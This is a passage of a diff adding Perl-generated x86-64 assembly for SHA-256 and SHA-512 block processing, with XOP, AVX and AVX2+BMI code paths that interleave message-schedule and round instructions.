+    my ($t0,$t1,$t2,$t3) = map("%xmm$_",(8..11));
+
+$code.=<<___;
+.align	16
+.Lloop_xop:
+	vmovdqa	$TABLE+`$SZ*2*$rounds`(%rip),$t3
+	vmovdqu	0x00($inp),@X[0]
+	lea	$TABLE+0x80(%rip),$Tbl	# size optimization
+	vmovdqu	0x10($inp),@X[1]
+	vmovdqu	0x20($inp),@X[2]
+	vpshufb	$t3,@X[0],@X[0]
+	vmovdqu	0x30($inp),@X[3]
+	vpshufb	$t3,@X[1],@X[1]
+	vmovdqu	0x40($inp),@X[4]
+	vpshufb	$t3,@X[2],@X[2]
+	vmovdqu	0x50($inp),@X[5]
+	vpshufb	$t3,@X[3],@X[3]
+	vmovdqu	0x60($inp),@X[6]
+	vpshufb	$t3,@X[4],@X[4]
+	vmovdqu	0x70($inp),@X[7]
+	vpshufb	$t3,@X[5],@X[5]
+	vpaddq	-0x80($Tbl),@X[0],$t0
+	vpshufb	$t3,@X[6],@X[6]
+	vpaddq	-0x60($Tbl),@X[1],$t1
+	vpshufb	$t3,@X[7],@X[7]
+	vpaddq	-0x40($Tbl),@X[2],$t2
+	vpaddq	-0x20($Tbl),@X[3],$t3
+	vmovdqa	$t0,0x00(%rsp)
+	vpaddq	0x00($Tbl),@X[4],$t0
+	vmovdqa	$t1,0x10(%rsp)
+	vpaddq	0x20($Tbl),@X[5],$t1
+	vmovdqa	$t2,0x20(%rsp)
+	vpaddq	0x40($Tbl),@X[6],$t2
+	vmovdqa	$t3,0x30(%rsp)
+	vpaddq	0x60($Tbl),@X[7],$t3
+	vmovdqa	$t0,0x40(%rsp)
+	mov	$A,$a1
+	vmovdqa	$t1,0x50(%rsp)
+	mov	$B,$a3
+	vmovdqa	$t2,0x60(%rsp)
+	xor	$C,$a3			# magic
+	vmovdqa	$t3,0x70(%rsp)
+	mov	$E,$a0
+	jmp	.Lxop_00_47
+
+.align	16
+.Lxop_00_47:
+	add	\$`16*2*$SZ`,$Tbl
+___
+sub XOP_512_00_47 () {
+my $j = shift;
+my $body = shift;
+my @X = @_;
+my @insns = (&$body,&$body);			# 52 instructions
+
+	&vpalignr	($t0,@X[1],@X[0],$SZ);	# X[1..2]
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpalignr	($t3,@X[5],@X[4],$SZ);	# X[9..10]
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vprotq		($t1,$t0,8*$SZ-$sigma0[1]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpsrlq		($t0,$t0,$sigma0[2]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpaddq	(@X[0],@X[0],$t3);	# X[0..1] += X[9..10]
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vprotq		($t2,$t1,$sigma0[1]-$sigma0[0]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpxor		($t0,$t0,$t1);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vprotq	($t3,@X[7],8*$SZ-$sigma1[1]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpxor		($t0,$t0,$t2);		# sigma0(X[1..2])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpsrlq	($t2,@X[7],$sigma1[2]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpaddq		(@X[0],@X[0],$t0);	# X[0..1] += sigma0(X[1..2])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vprotq	($t1,$t3,$sigma1[1]-$sigma1[0]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpxor		($t3,$t3,$t2);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpxor		($t3,$t3,$t1);		# sigma1(X[14..15])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpaddq		(@X[0],@X[0],$t3);	# X[0..1] += sigma1(X[14..15])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpaddq		($t2,@X[0],16*2*$j-0x80."($Tbl)");
+	  foreach (@insns) { eval; }		# remaining instructions
+	&vmovdqa	(16*$j."(%rsp)",$t2);
+}
+
+    for ($i=0,$j=0; $j<8; $j++) {
+	&XOP_512_00_47($j,\&body_00_15,@X);
+	push(@X,shift(@X));			# rotate(@X)
+    }
+	&cmpb	($SZ-1+16*2*$SZ-0x80."($Tbl)",0);
+	&jne	(".Lxop_00_47");
+
+    for ($i=0; $i<16; ) {
+	foreach(body_00_15()) { eval; }
+    }
+}
+$code.=<<___;
+	mov	$_ctx,$ctx
+	mov	$a1,$A
+
+	add	$SZ*0($ctx),$A
+	lea	16*$SZ($inp),$inp
+	add	$SZ*1($ctx),$B
+	add	$SZ*2($ctx),$C
+	add	$SZ*3($ctx),$D
+	add	$SZ*4($ctx),$E
+	add	$SZ*5($ctx),$F
+	add	$SZ*6($ctx),$G
+	add	$SZ*7($ctx),$H
+
+	cmp	$_end,$inp
+
+	mov	$A,$SZ*0($ctx)
+	mov	$B,$SZ*1($ctx)
+	mov	$C,$SZ*2($ctx)
+	mov	$D,$SZ*3($ctx)
+	mov	$E,$SZ*4($ctx)
+	mov	$F,$SZ*5($ctx)
+	mov	$G,$SZ*6($ctx)
+	mov	$H,$SZ*7($ctx)
+	jb	.Lloop_xop
+
+	mov	$_rsp,%rsi
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	movaps	16*$SZ+32(%rsp),%xmm6
+	movaps	16*$SZ+48(%rsp),%xmm7
+	movaps	16*$SZ+64(%rsp),%xmm8
+	movaps	16*$SZ+80(%rsp),%xmm9
+___
+$code.=<<___ if ($win64 && $SZ>4);
+	movaps	16*$SZ+96(%rsp),%xmm10
+	movaps	16*$SZ+112(%rsp),%xmm11
+___
+$code.=<<___;
+	mov	(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lepilogue_xop:
+	ret
+.size	${func}_xop,.-${func}_xop
+___
+}
+######################################################################
+# AVX+shrd code path
+#
+local *ror = sub { &shrd(@_[0],@_) };
+
+$code.=<<___;
+.type	${func}_avx,\@function,3
+.align	64
+${func}_avx:
+.Lavx_shortcut:
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	mov	%rsp,%r11		# copy %rsp
+	shl	\$4,%rdx		# num*16
+	sub	\$`$framesz+$win64*16*($SZ==4?4:6)`,%rsp
+	lea	($inp,%rdx,$SZ),%rdx	# inp+num*16*$SZ
+	and	\$-64,%rsp		# align stack frame
+	mov	$ctx,$_ctx		# save ctx, 1st arg
+	mov	$inp,$_inp		# save inp, 2nd arh
+	mov	%rdx,$_end		# save end pointer, "3rd" arg
+	mov	%r11,$_rsp		# save copy of %rsp
+___
+$code.=<<___ if ($win64);
+	movaps	%xmm6,16*$SZ+32(%rsp)
+	movaps	%xmm7,16*$SZ+48(%rsp)
+	movaps	%xmm8,16*$SZ+64(%rsp)
+	movaps	%xmm9,16*$SZ+80(%rsp)
+___
+$code.=<<___ if ($win64 && $SZ>4);
+	movaps	%xmm10,16*$SZ+96(%rsp)
+	movaps	%xmm11,16*$SZ+112(%rsp)
+___
+$code.=<<___;
+.Lprologue_avx:
+
+	vzeroupper
+	mov	$SZ*0($ctx),$A
+	mov	$SZ*1($ctx),$B
+	mov	$SZ*2($ctx),$C
+	mov	$SZ*3($ctx),$D
+	mov	$SZ*4($ctx),$E
+	mov	$SZ*5($ctx),$F
+	mov	$SZ*6($ctx),$G
+	mov	$SZ*7($ctx),$H
+___
+					if ($SZ==4) {	# SHA256
+    my @X = map("%xmm$_",(0..3));
+    my ($t0,$t1,$t2,$t3, $t4,$t5) = map("%xmm$_",(4..9));
+
+$code.=<<___;
+	vmovdqa	$TABLE+`$SZ*2*$rounds`+32(%rip),$t4
+	vmovdqa	$TABLE+`$SZ*2*$rounds`+64(%rip),$t5
+	jmp	.Lloop_avx
+.align	16
+.Lloop_avx:
+	vmovdqa	$TABLE+`$SZ*2*$rounds`(%rip),$t3
+	vmovdqu	0x00($inp),@X[0]
+	vmovdqu	0x10($inp),@X[1]
+	vmovdqu	0x20($inp),@X[2]
+	vmovdqu	0x30($inp),@X[3]
+	vpshufb	$t3,@X[0],@X[0]
+	lea	$TABLE(%rip),$Tbl
+	vpshufb	$t3,@X[1],@X[1]
+	vpshufb	$t3,@X[2],@X[2]
+	vpaddd	0x00($Tbl),@X[0],$t0
+	vpshufb	$t3,@X[3],@X[3]
+	vpaddd	0x20($Tbl),@X[1],$t1
+	vpaddd	0x40($Tbl),@X[2],$t2
+	vpaddd	0x60($Tbl),@X[3],$t3
+	vmovdqa	$t0,0x00(%rsp)
+	mov	$A,$a1
+	vmovdqa	$t1,0x10(%rsp)
+	mov	$B,$a3
+	vmovdqa	$t2,0x20(%rsp)
+	xor	$C,$a3			# magic
+	vmovdqa	$t3,0x30(%rsp)
+	mov	$E,$a0
+	jmp	.Lavx_00_47
+
+.align	16
+.Lavx_00_47:
+	sub	\$`-16*2*$SZ`,$Tbl	# size optimization
+___
+sub Xupdate_256_AVX () {
+	(
+	'&vpalignr	($t0,@X[1],@X[0],$SZ)',	# X[1..4]
+	 '&vpalignr	($t3,@X[3],@X[2],$SZ)',	# X[9..12]
+	'&vpsrld	($t2,$t0,$sigma0[0]);',
+	 '&vpaddd	(@X[0],@X[0],$t3)',	# X[0..3] += X[9..12]
+	'&vpsrld	($t3,$t0,$sigma0[2])',
+	'&vpslld	($t1,$t0,8*$SZ-$sigma0[1]);',
+	'&vpxor		($t0,$t3,$t2)',
+	 '&vpshufd	($t3,@X[3],0b11111010)',# X[14..15]
+	'&vpsrld	($t2,$t2,$sigma0[1]-$sigma0[0]);',
+	'&vpxor		($t0,$t0,$t1)',
+	'&vpslld	($t1,$t1,$sigma0[1]-$sigma0[0]);',
+	'&vpxor		($t0,$t0,$t2)',
+	 '&vpsrld	($t2,$t3,$sigma1[2]);',
+	'&vpxor		($t0,$t0,$t1)',		# sigma0(X[1..4])
+	 '&vpsrlq	($t3,$t3,$sigma1[0]);',
+	'&vpaddd	(@X[0],@X[0],$t0)',	# X[0..3] += sigma0(X[1..4])
+	 '&vpxor	($t2,$t2,$t3);',
+	 '&vpsrlq	($t3,$t3,$sigma1[1]-$sigma1[0])',
+	 '&vpxor	($t2,$t2,$t3)',
+	 '&vpshufb	($t2,$t2,$t4)',		# sigma1(X[14..15])
+	'&vpaddd	(@X[0],@X[0],$t2)',	# X[0..1] += sigma1(X[14..15])
+	 '&vpshufd	($t3,@X[0],0b01010000)',# X[16..17]
+	 '&vpsrld	($t2,$t3,$sigma1[2])',
+	 '&vpsrlq	($t3,$t3,$sigma1[0])',
+	 '&vpxor	($t2,$t2,$t3);',
+	 '&vpsrlq	($t3,$t3,$sigma1[1]-$sigma1[0])',
+	 '&vpxor	($t2,$t2,$t3)',
+	 '&vpshufb	($t2,$t2,$t5)',
+	'&vpaddd	(@X[0],@X[0],$t2)'	# X[2..3] += sigma1(X[16..17])
+	);
+}
+
+sub AVX_256_00_47 () {
+my $j = shift;
+my $body = shift;
+my @X = @_;
+my @insns = (&$body,&$body,&$body,&$body);	# 104 instructions
+
+	foreach (Xupdate_256_AVX()) {		# 29 instructions
+	    eval;
+	    eval(shift(@insns));
+	    eval(shift(@insns));
+	    eval(shift(@insns));
+	}
+	&vpaddd		($t2,@X[0],16*2*$j."($Tbl)");
+	  foreach (@insns) { eval; }		# remaining instructions
+	&vmovdqa	(16*$j."(%rsp)",$t2);
+}
+
+    for ($i=0,$j=0; $j<4; $j++) {
+	&AVX_256_00_47($j,\&body_00_15,@X);
+	push(@X,shift(@X));			# rotate(@X)
+    }
+	&cmpb	($SZ-1+16*2*$SZ."($Tbl)",0);
+	&jne	(".Lavx_00_47");
+
+    for ($i=0; $i<16; ) {
+	foreach(body_00_15()) { eval; }
+    }
+
+					} else {	# SHA512
+    my @X = map("%xmm$_",(0..7));
+    my ($t0,$t1,$t2,$t3) = map("%xmm$_",(8..11));
+
+$code.=<<___;
+	jmp	.Lloop_avx
+.align	16
+.Lloop_avx:
+	vmovdqa	$TABLE+`$SZ*2*$rounds`(%rip),$t3
+	vmovdqu	0x00($inp),@X[0]
+	lea	$TABLE+0x80(%rip),$Tbl	# size optimization
+	vmovdqu	0x10($inp),@X[1]
+	vmovdqu	0x20($inp),@X[2]
+	vpshufb	$t3,@X[0],@X[0]
+	vmovdqu	0x30($inp),@X[3]
+	vpshufb	$t3,@X[1],@X[1]
+	vmovdqu	0x40($inp),@X[4]
+	vpshufb	$t3,@X[2],@X[2]
+	vmovdqu	0x50($inp),@X[5]
+	vpshufb	$t3,@X[3],@X[3]
+	vmovdqu	0x60($inp),@X[6]
+	vpshufb	$t3,@X[4],@X[4]
+	vmovdqu	0x70($inp),@X[7]
+	vpshufb	$t3,@X[5],@X[5]
+	vpaddq	-0x80($Tbl),@X[0],$t0
+	vpshufb	$t3,@X[6],@X[6]
+	vpaddq	-0x60($Tbl),@X[1],$t1
+	vpshufb	$t3,@X[7],@X[7]
+	vpaddq	-0x40($Tbl),@X[2],$t2
+	vpaddq	-0x20($Tbl),@X[3],$t3
+	vmovdqa	$t0,0x00(%rsp)
+	vpaddq	0x00($Tbl),@X[4],$t0
+	vmovdqa	$t1,0x10(%rsp)
+	vpaddq	0x20($Tbl),@X[5],$t1
+	vmovdqa	$t2,0x20(%rsp)
+	vpaddq	0x40($Tbl),@X[6],$t2
+	vmovdqa	$t3,0x30(%rsp)
+	vpaddq	0x60($Tbl),@X[7],$t3
+	vmovdqa	$t0,0x40(%rsp)
+	mov	$A,$a1
+	vmovdqa	$t1,0x50(%rsp)
+	mov	$B,$a3
+	vmovdqa	$t2,0x60(%rsp)
+	xor	$C,$a3			# magic
+	vmovdqa	$t3,0x70(%rsp)
+	mov	$E,$a0
+	jmp	.Lavx_00_47
+
+.align	16
+.Lavx_00_47:
+	add	\$`16*2*$SZ`,$Tbl
+___
+sub Xupdate_512_AVX () {
+	(
+	'&vpalignr	($t0,@X[1],@X[0],$SZ)',	# X[1..2]
+	 '&vpalignr	($t3,@X[5],@X[4],$SZ)',	# X[9..10]
+	'&vpsrlq	($t2,$t0,$sigma0[0])',
+	 '&vpaddq	(@X[0],@X[0],$t3);',	# X[0..1] += X[9..10]
+	'&vpsrlq	($t3,$t0,$sigma0[2])',
+	'&vpsllq	($t1,$t0,8*$SZ-$sigma0[1]);',
+	 '&vpxor	($t0,$t3,$t2)',
+	'&vpsrlq	($t2,$t2,$sigma0[1]-$sigma0[0]);',
+	 '&vpxor	($t0,$t0,$t1)',
+	'&vpsllq	($t1,$t1,$sigma0[1]-$sigma0[0]);',
+	 '&vpxor	($t0,$t0,$t2)',
+	 '&vpsrlq	($t3,@X[7],$sigma1[2]);',
+	'&vpxor		($t0,$t0,$t1)',		# sigma0(X[1..2])
+	 '&vpsllq	($t2,@X[7],8*$SZ-$sigma1[1]);',
+	'&vpaddq	(@X[0],@X[0],$t0)',	# X[0..1] += sigma0(X[1..2])
+	 '&vpsrlq	($t1,@X[7],$sigma1[0]);',
+	 '&vpxor	($t3,$t3,$t2)',
+	 '&vpsllq	($t2,$t2,$sigma1[1]-$sigma1[0]);',
+	 '&vpxor	($t3,$t3,$t1)',
+	 '&vpsrlq	($t1,$t1,$sigma1[1]-$sigma1[0]);',
+	 '&vpxor	($t3,$t3,$t2)',
+	 '&vpxor	($t3,$t3,$t1)',		# sigma1(X[14..15])
+	'&vpaddq	(@X[0],@X[0],$t3)',	# X[0..1] += sigma1(X[14..15])
+	);
+}
+
+sub AVX_512_00_47 () {
+my $j = shift;
+my $body = shift;
+my @X = @_;
+my @insns = (&$body,&$body);			# 52 instructions
+
+	foreach (Xupdate_512_AVX()) {		# 23 instructions
+	    eval;
+	    eval(shift(@insns));
+	    eval(shift(@insns));
+	}
+	&vpaddq		($t2,@X[0],16*2*$j-0x80."($Tbl)");
+	  foreach (@insns) { eval; }		# remaining instructions
+	&vmovdqa	(16*$j."(%rsp)",$t2);
+}
+
+    for ($i=0,$j=0; $j<8; $j++) {
+	&AVX_512_00_47($j,\&body_00_15,@X);
+	push(@X,shift(@X));			# rotate(@X)
+    }
+	&cmpb	($SZ-1+16*2*$SZ-0x80."($Tbl)",0);
+	&jne	(".Lavx_00_47");
+
+    for ($i=0; $i<16; ) {
+	foreach(body_00_15()) { eval; }
+    }
+}
+$code.=<<___;
+	mov	$_ctx,$ctx
+	mov	$a1,$A
+
+	add	$SZ*0($ctx),$A
+	lea	16*$SZ($inp),$inp
+	add	$SZ*1($ctx),$B
+	add	$SZ*2($ctx),$C
+	add	$SZ*3($ctx),$D
+	add	$SZ*4($ctx),$E
+	add	$SZ*5($ctx),$F
+	add	$SZ*6($ctx),$G
+	add	$SZ*7($ctx),$H
+
+	cmp	$_end,$inp
+
+	mov	$A,$SZ*0($ctx)
+	mov	$B,$SZ*1($ctx)
+	mov	$C,$SZ*2($ctx)
+	mov	$D,$SZ*3($ctx)
+	mov	$E,$SZ*4($ctx)
+	mov	$F,$SZ*5($ctx)
+	mov	$G,$SZ*6($ctx)
+	mov	$H,$SZ*7($ctx)
+	jb	.Lloop_avx
+
+	mov	$_rsp,%rsi
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	movaps	16*$SZ+32(%rsp),%xmm6
+	movaps	16*$SZ+48(%rsp),%xmm7
+	movaps	16*$SZ+64(%rsp),%xmm8
+	movaps	16*$SZ+80(%rsp),%xmm9
+___
+$code.=<<___ if ($win64 && $SZ>4);
+	movaps	16*$SZ+96(%rsp),%xmm10
+	movaps	16*$SZ+112(%rsp),%xmm11
+___
+$code.=<<___;
+	mov	(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lepilogue_avx:
+	ret
+.size	${func}_avx,.-${func}_avx
+___
+
+if ($avx>1) {{
+######################################################################
+# AVX2+BMI code path
+#
+my $a5=$SZ==4?"%esi":"%rsi";	# zap $inp 
+my $PUSH8=8*2*$SZ;
+use integer;
+
+sub bodyx_00_15 () {
+	# at start $a1 should be zero, $a3 - $b^$c and $a4 copy of $f
+	(
+	'($a,$b,$c,$d,$e,$f,$g,$h)=@ROT;'.
+
+	'&add	($h,(32*($i/(16/$SZ))+$SZ*($i%(16/$SZ)))%$PUSH8.$base)',    # h+=X[i]+K[i]
+	'&and	($a4,$e)',		# f&e
+	'&rorx	($a0,$e,$Sigma1[2])',
+	'&rorx	($a2,$e,$Sigma1[1])',
+
+	'&lea	($a,"($a,$a1)")',	# h+=Sigma0(a) from the past
+	'&lea	($h,"($h,$a4)")',
+	'&andn	($a4,$e,$g)',		# ~e&g
+	'&xor	($a0,$a2)',
+
+	'&rorx	($a1,$e,$Sigma1[0])',
+	'&lea	($h,"($h,$a4)")',	# h+=Ch(e,f,g)=(e&f)+(~e&g)
+	'&xor	($a0,$a1)',		# Sigma1(e)
+	'&mov	($a2,$a)',
+
+	'&rorx	($a4,$a,$Sigma0[2])',
+	'&lea	($h,"($h,$a0)")',	# h+=Sigma1(e)
+	'&xor	($a2,$b)',		# a^b, b^c in next round
+	'&rorx	($a1,$a,$Sigma0[1])',
+
+	'&rorx	($a0,$a,$Sigma0[0])',
+	'&lea	($d,"($d,$h)")',	# d+=h
+	'&and	($a3,$a2)',		# (b^c)&(a^b)
+	'&xor	($a1,$a4)',
+
+	'&xor	($a3,$b)',		# Maj(a,b,c)=Ch(a^b,c,b)
+	'&xor	($a1,$a0)',		# Sigma0(a)
+	'&lea	($h,"($h,$a3)");'.	# h+=Maj(a,b,c)
+	'&mov	($a4,$e)',		# copy of f in future
+
+	'($a2,$a3) = ($a3,$a2); unshift(@ROT,pop(@ROT)); $i++;'
+	);
+	# and at the finish one has to $a+=$a1
+}
+
+$code.=<<___;
+.type	${func}_avx2,\@function,3
+.align	64
+${func}_avx2:
+.Lavx2_shortcut:
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	mov	%rsp,%r11		# copy %rsp
+	sub	\$`2*$SZ*$rounds+4*8+$win64*16*($SZ==4?4:6)`,%rsp
+	shl	\$4,%rdx		# num*16
+	and	\$-256*$SZ,%rsp		# align stack frame
+	lea	($inp,%rdx,$SZ),%rdx	# inp+num*16*$SZ
+	add	\$`2*$SZ*($rounds-8)`,%rsp
+	mov	$ctx,$_ctx		# save ctx, 1st arg
+	mov	$inp,$_inp		# save inp, 2nd arh
+	mov	%rdx,$_end		# save end pointer, "3rd" arg
+	mov	%r11,$_rsp		# save copy of %rsp
+___
+$code.=<<___ if ($win64);
+	movaps	%xmm6,16*$SZ+32(%rsp)
+	movaps	%xmm7,16*$SZ+48(%rsp)
+	movaps	%xmm8,16*$SZ+64(%rsp)
+	movaps	%xmm9,16*$SZ+80(%rsp)
+___
+$code.=<<___ if ($win64 && $SZ>4);
+	movaps	%xmm10,16*$SZ+96(%rsp)
+	movaps	%xmm11,16*$SZ+112(%rsp)
+___
+$code.=<<___;
+.Lprologue_avx2:
+
+	vzeroupper
+	sub	\$-16*$SZ,$inp		# inp++, size optimization
+	mov	$SZ*0($ctx),$A
+	mov	$inp,%r12		# borrow $T1
+	mov	$SZ*1($ctx),$B
+	cmp	%rdx,$inp		# $_end
+	mov	$SZ*2($ctx),$C
+	cmove	%rsp,%r12		# next block or random data
+	mov	$SZ*3($ctx),$D
+	mov	$SZ*4($ctx),$E
+	mov	$SZ*5($ctx),$F
+	mov	$SZ*6($ctx),$G
+	mov	$SZ*7($ctx),$H
+___
+					if ($SZ==4) {	# SHA256
+    my @X = map("%ymm$_",(0..3));
+    my ($t0,$t1,$t2,$t3, $t4,$t5) = map("%ymm$_",(4..9));
+
+$code.=<<___;
+	vmovdqa	$TABLE+`$SZ*2*$rounds`+32(%rip),$t4
+	vmovdqa	$TABLE+`$SZ*2*$rounds`+64(%rip),$t5
+	jmp	.Loop_avx2
+.align	16
+.Loop_avx2:
+	vmovdqa	$TABLE+`$SZ*2*$rounds`(%rip),$t3
+	vmovdqu	-16*$SZ+0($inp),%xmm0
+	vmovdqu	-16*$SZ+16($inp),%xmm1
+	vmovdqu	-16*$SZ+32($inp),%xmm2
+	vmovdqu	-16*$SZ+48($inp),%xmm3
+	#mov		$inp,$_inp	# offload $inp
+	vinserti128	\$1,(%r12),@X[0],@X[0]
+	vinserti128	\$1,16(%r12),@X[1],@X[1]
+	vpshufb		$t3,@X[0],@X[0]
+	vinserti128	\$1,32(%r12),@X[2],@X[2]
+	vpshufb		$t3,@X[1],@X[1]
+	vinserti128	\$1,48(%r12),@X[3],@X[3]
+
+	lea	$TABLE(%rip),$Tbl
+	vpshufb	$t3,@X[2],@X[2]
+	vpaddd	0x00($Tbl),@X[0],$t0
+	vpshufb	$t3,@X[3],@X[3]
+	vpaddd	0x20($Tbl),@X[1],$t1
+	vpaddd	0x40($Tbl),@X[2],$t2
+	vpaddd	0x60($Tbl),@X[3],$t3
+	vmovdqa	$t0,0x00(%rsp)
+	xor	$a1,$a1
+	vmovdqa	$t1,0x20(%rsp)
+	lea	-$PUSH8(%rsp),%rsp
+	mov	$B,$a3
+	vmovdqa	$t2,0x00(%rsp)
+	xor	$C,$a3			# magic
+	vmovdqa	$t3,0x20(%rsp)
+	mov	$F,$a4
+	sub	\$-16*2*$SZ,$Tbl	# size optimization
+	jmp	.Lavx2_00_47
+
+.align	16
+.Lavx2_00_47:
+___
+
+sub AVX2_256_00_47 () {
+my $j = shift;
+my $body = shift;
+my @X = @_;
+my @insns = (&$body,&$body,&$body,&$body);	# 96 instructions
+my $base = "+2*$PUSH8(%rsp)";
+
+	&lea	("%rsp","-$PUSH8(%rsp)")	if (($j%2)==0);
+	foreach (Xupdate_256_AVX()) {		# 29 instructions
+	    eval;
+	    eval(shift(@insns));
+	    eval(shift(@insns));
+	    eval(shift(@insns));
+	}
+	&vpaddd		($t2,@X[0],16*2*$j."($Tbl)");
+	  foreach (@insns) { eval; }		# remaining instructions
+	&vmovdqa	((32*$j)%$PUSH8."(%rsp)",$t2);
+}
+
+    for ($i=0,$j=0; $j<4; $j++) {
+	&AVX2_256_00_47($j,\&bodyx_00_15,@X);
+	push(@X,shift(@X));			# rotate(@X)
+    }
+	&lea	($Tbl,16*2*$SZ."($Tbl)");
+	&cmpb	(($SZ-1)."($Tbl)",0);
+	&jne	(".Lavx2_00_47");
+
+    for ($i=0; $i<16; ) {
+	my $base=$i<8?"+$PUSH8(%rsp)":"(%rsp)";
+	foreach(bodyx_00_15()) { eval; }
+    }
+					} else {	# SHA512
+    my @X = map("%ymm$_",(0..7));
+    my ($t0,$t1,$t2,$t3) = map("%ymm$_",(8..11));
+
+$code.=<<___;
+	jmp	.Loop_avx2
+.align	16
+.Loop_avx2:
+	vmovdqu	-16*$SZ($inp),%xmm0
+	vmovdqu	-16*$SZ+16($inp),%xmm1
+	vmovdqu	-16*$SZ+32($inp),%xmm2
+	lea	$TABLE+0x80(%rip),$Tbl	# size optimization
+	vmovdqu	-16*$SZ+48($inp),%xmm3
+	vmovdqu	-16*$SZ+64($inp),%xmm4
+	vmovdqu	-16*$SZ+80($inp),%xmm5
+	vmovdqu	-16*$SZ+96($inp),%xmm6
+	vmovdqu	-16*$SZ+112($inp),%xmm7
+	#mov	$inp,$_inp	# offload $inp
+	vmovdqa	`$SZ*2*$rounds-0x80`($Tbl),$t2
+	vinserti128	\$1,(%r12),@X[0],@X[0]
+	vinserti128	\$1,16(%r12),@X[1],@X[1]
+	 vpshufb	$t2,@X[0],@X[0]
+	vinserti128	\$1,32(%r12),@X[2],@X[2]
+	 vpshufb	$t2,@X[1],@X[1]
+	vinserti128	\$1,48(%r12),@X[3],@X[3]
+	 vpshufb	$t2,@X[2],@X[2]
+	vinserti128	\$1,64(%r12),@X[4],@X[4]
+	 vpshufb	$t2,@X[3],@X[3]
+	vinserti128	\$1,80(%r12),@X[5],@X[5]
+	 vpshufb	$t2,@X[4],@X[4]
+	vinserti128	\$1,96(%r12),@X[6],@X[6]
+	 vpshufb	$t2,@X[5],@X[5]
+	vinserti128	\$1,112(%r12),@X[7],@X[7]
+
+	vpaddq	-0x80($Tbl),@X[0],$t0
+	vpshufb	$t2,@X[6],@X[6]
+	vpaddq	-0x60($Tbl),@X[1],$t1
+	vpshufb	$t2,@X[7],@X[7]
+	vpaddq	-0x40($Tbl),@X[2],$t2
+	vpaddq	-0x20($Tbl),@X[3],$t3
+	vmovdqa	$t0,0x00(%rsp)
+	vpaddq	0x00($Tbl),@X[4],$t0
+	vmovdqa	$t1,0x20(%rsp)
+	vpaddq	0x20($Tbl),@X[5],$t1
+	vmovdqa	$t2,0x40(%rsp)
+	vpaddq	0x40($Tbl),@X[6],$t2
+	vmovdqa	$t3,0x60(%rsp)
+	lea	-$PUSH8(%rsp),%rsp
+	vpaddq	0x60($Tbl),@X[7],$t3
+	vmovdqa	$t0,0x00(%rsp)
+	xor	$a1,$a1
+	vmovdqa	$t1,0x20(%rsp)
+	mov	$B,$a3
+	vmovdqa	$t2,0x40(%rsp)
+	xor	$C,$a3			# magic
+	vmovdqa	$t3,0x60(%rsp)
+	mov	$F,$a4
+	add	\$16*2*$SZ,$Tbl
+	jmp	.Lavx2_00_47
+
+.align	16
+.Lavx2_00_47:
+___
+
+sub AVX2_512_00_47 () {
+my $j = shift;
+my $body = shift;
+my @X = @_;
+my @insns = (&$body,&$body);			# 48 instructions
+my $base = "+2*$PUSH8(%rsp)";
+
+	&lea	("%rsp","-$PUSH8(%rsp)")	if (($j%4)==0);
+	foreach (Xupdate_512_AVX()) {		# 23 instructions
+	    eval;
+	    if ($_ !~ /\;$/) {
+		eval(shift(@insns));
+		eval(shift(@insns));
+		eval(shift(@insns));
+	    }
+	}
+	&vpaddq		($t2,@X[0],16*2*$j-0x80."($Tbl)");
+	  foreach (@insns) { eval; }		# remaining instructions
+	&vmovdqa	((32*$j)%$PUSH8."(%rsp)",$t2);
+}
+
+    for ($i=0,$j=0; $j<8; $j++) {
+	&AVX2_512_00_47($j,\&bodyx_00_15,@X);
+	push(@X,shift(@X));			# rotate(@X)
+    }
+	&lea	($Tbl,16*2*$SZ."($Tbl)");
+	&cmpb	(($SZ-1-0x80)."($Tbl)",0);
+	&jne	(".Lavx2_00_47");
+
+    for ($i=0; $i<16; ) {
+	my $base=$i<8?"+$PUSH8(%rsp)":"(%rsp)";
+	foreach(bodyx_00_15()) { eval; }
+    }
+}
+$code.=<<___;
+	mov	`2*$SZ*$rounds`(%rsp),$ctx	# $_ctx
+	add	$a1,$A
+	#mov	`2*$SZ*$rounds+8`(%rsp),$inp	# $_inp
+	lea	`2*$SZ*($rounds-8)`(%rsp),$Tbl
+
+	add	$SZ*0($ctx),$A
+	add	$SZ*1($ctx),$B
+	add	$SZ*2($ctx),$C
+	add	$SZ*3($ctx),$D
+	add	$SZ*4($ctx),$E
+	add	$SZ*5($ctx),$F
+	add	$SZ*6($ctx),$G
+	add	$SZ*7($ctx),$H
+
+	mov	$A,$SZ*0($ctx)
+	mov	$B,$SZ*1($ctx)
+	mov	$C,$SZ*2($ctx)
+	mov	$D,$SZ*3($ctx)
+	mov	$E,$SZ*4($ctx)
+	mov	$F,$SZ*5($ctx)
